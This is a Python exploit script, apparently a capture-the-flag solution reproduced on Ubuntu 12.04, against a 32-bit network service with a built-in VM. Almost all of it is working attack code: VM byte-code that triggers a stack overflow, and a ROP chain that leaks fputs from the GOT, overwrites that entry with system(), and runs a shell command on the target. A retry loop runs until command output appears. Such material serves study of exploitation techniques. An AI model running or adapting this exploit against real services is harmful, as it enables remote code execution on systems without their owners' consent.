우분투 12.04에서 재현 (아래 스크립트에 하드코딩된 libc 오프셋은 이 환경의 libc 빌드 기준이므로, 다른 libc에서는 다시 계산해야 함)
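"""Exploit for a 32-bit network service, reproduced on Ubuntu 12.04.

One attempt works as follows (all addresses are for the target binary, which
has fixed PLT/GOT/.bss addresses, and all libc offsets are for the Ubuntu
12.04 i386 libc; they are taken verbatim from the original write-up and are
not re-derived here):

1. Connect, read the banner, then send the service a fixed-size block of
   byte-code for its built-in VM (the ``auth 2`` / ``auth 3`` sections) that
   ends in a stack overflow.
2. The overflow returns into a ROP chain built from PLT stubs and a
   pop;pop;pop;pop;ret gadget (``ppppr``).  The chain runs on the target and
   assumes fd 4 is this client connection:
       send(4, &fputs@GOT, 4, 0)      -> leak the libc address of fputs
       recv(4, &fputs@GOT, 4, 0)      -> overwrite fputs@GOT with system
       recv(4, bss, len(cmd), 0)      -> drop the shell command into .bss
       fputs(bss)                     -> now really system(cmd)
3. Locally: read the 4-byte leak, compute system() from the fixed libc
   offsets, send it back followed by ``cmd``, and look for ``uid`` in the
   output.

The original looped until ``uid`` came back, so some step is evidently
non-deterministic (ASLR and/or the VM "secret" read in ``auth 2``); exactly
which cannot be recovered from the code alone.

Changes versus the original script:
  * ``send`` -> ``sendall`` (a 6 KiB payload may otherwise be sent partially).
  * The leaked pointer is read with an exact-length loop instead of a single
    ``recv(4)`` fed straight into ``unpack``.
  * The bare ``except:`` that also swallowed KeyboardInterrupt is replaced by
    a targeted handler; sockets are closed on every path, not just on success.
  * Payload construction is a pure function so it can be unit-tested.

Runs on Python 2.6+ and 3.x: payloads are ``bytes`` literals + ``struct.pack``
and every ``print`` takes a single argument.
"""
from socket import *
from struct import *
import time
from contextlib import closing
from itertools import count

# --- target binary layout (32-bit, fixed addresses) -------------------------
HOST = "localhost"
PORT = 8080
fputs_plt = 0x8048800
fputs_got = 0x804B064
recv_plt = 0x8048810
send_plt = 0x8048830
ppppr = 0x80499FC   # pop;pop;pop;pop;ret -- discards the 4 args of each libc call
bss = 0x804c0dc     # scratch buffer the shell command is recv()'d into

# --- libc offsets (Ubuntu 12.04 i386) ---------------------------------------
# The original computed ``fputs_addr - 0x66100 + 0x3f430``; any other libc
# build needs new values.
LIBC_FPUTS_OFFSET = 0x66100
LIBC_SYSTEM_OFFSET = 0x3f430

# File descriptor the chain uses for send()/recv() on the target; the shell
# command redirects its output to the same fd.  The original assumed fd 4 is
# the client connection -- confirm against the target if attempts never leak.
REMOTE_FD = 4

# Command run by system() on the target.  The trailing NUL terminates the
# string for system(); the length (including NUL) is baked into the chain.
cmd = b"id>&4\x00"

# The service reads exactly this many bytes of VM code; the payload is padded
# with spaces up to it.
PAYLOAD_SIZE = 0x400 * 6


def build_vmcode(command=cmd):
    """Return the VM byte-code + ROP payload, padded to PAYLOAD_SIZE bytes.

    ``command`` only affects the chain through ``len(command)`` (the length
    argument of the second recv()); the command bytes themselves are sent
    separately after the leak.

    Raises ValueError if the unpadded payload exceeds PAYLOAD_SIZE.  The
    original would have produced *no* padding in that case (negative repeat
    count) and silently desynchronised the service's fixed-size read.
    """
    parts = []
    # auth 2 -- opcodes of the service's VM.  Only the original author's
    # comments are known; the opcode semantics are not recoverable here.
    parts.append(b"#\x00\x00\x00\x00" * 1024)         # index + 4*
    parts.append((b"P\x10" + b"$\x08") * 8)           # get secret
    parts.append(b"P\x10")
    parts.append(b"9R")
    # auth 3
    parts.append(b"\x91")
    parts.append(pack("<L", 0xdeadbeef) * 2)
    # overflow: opcode 0xef, then filler up to the saved return address
    parts.append(b"\xef")
    parts.append(b"A" * 0x20)
    # ROP chain (see module docstring).  Each libc call returns into the
    # 4-pop gadget, which clears its four arguments before the next frame.
    chain = [
        send_plt, ppppr, REMOTE_FD, fputs_got, 4, 0,        # leak fputs
        recv_plt, ppppr, REMOTE_FD, fputs_got, 4, 0,        # fputs@GOT <- system
        recv_plt, ppppr, REMOTE_FD, bss, len(command), 0,   # bss <- command
        fputs_plt,                                          # fputs(bss) == system(cmd)
    ]
    parts.append(b"".join(pack("<L", v) for v in chain))
    parts.append(b"AAAA")            # return address after system(); never used
    parts.append(pack("<L", bss))    # first (only consumed) argument: the command
    payload = b"".join(parts)
    if len(payload) > PAYLOAD_SIZE:
        raise ValueError("payload is %d bytes, limit is %d" % (len(payload), PAYLOAD_SIZE))
    return payload + b" " * (PAYLOAD_SIZE - len(payload))


def recv_exact(sock, n):
    """Read exactly ``n`` bytes from ``sock``; return None if the peer closes first.

    A single recv() may return fewer bytes than requested, so the original
    ``unpack('<L', s.recv(4))`` could raise struct.error on a short read.
    """
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            return None
        buf += chunk
    return buf


def libc_system_from_fputs(fputs_addr):
    """Derive system()'s address from a leaked fputs() address.

    Valid only for the libc build the offsets above were taken from.
    """
    return fputs_addr - LIBC_FPUTS_OFFSET + LIBC_SYSTEM_OFFSET


def attempt(host=HOST, port=PORT, command=cmd):
    """Run one exploitation round; return the command output (bytes) or None.

    None means the leak never arrived (short read or connection reset), which
    is the case the original retried.  Errors while connecting propagate, as
    they did in the original.
    """
    s = socket(AF_INET, SOCK_STREAM)
    with closing(s):                 # py2 sockets are not context managers
        s.connect((host, port))
        time.sleep(0.3)              # kept from the original; presumably lets the banner arrive
        print(s.recv(10000))
        s.sendall(build_vmcode(command))
        try:
            leak = recv_exact(s, 4)
        except IOError:
            # socket.error (OSError on py3) while waiting for the leak.  Caught
            # as IOError because both ``socket`` and ``struct`` export a name
            # ``error`` and the two star imports above make it ambiguous.
            return None
        if leak is None:
            return None
        fputs_addr = unpack("<L", leak)[0]
        system_addr = libc_system_from_fputs(fputs_addr)
        print("System: " + hex(system_addr))
        # Two sends, as in the original.  Coalescing into one TCP segment is
        # harmless: the target recv()s exactly 4 bytes, then exactly len(cmd).
        s.sendall(pack("<L", system_addr))
        s.sendall(command)
        return s.recv(65000)


def main():
    """Retry attempts until the output of ``cmd`` contains ``uid``."""
    for i in count():
        print("Send! %d" % i)
        out = attempt()
        if out is not None and b"uid" in out:
            print(out)
            break


if __name__ == "__main__":
    main()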
 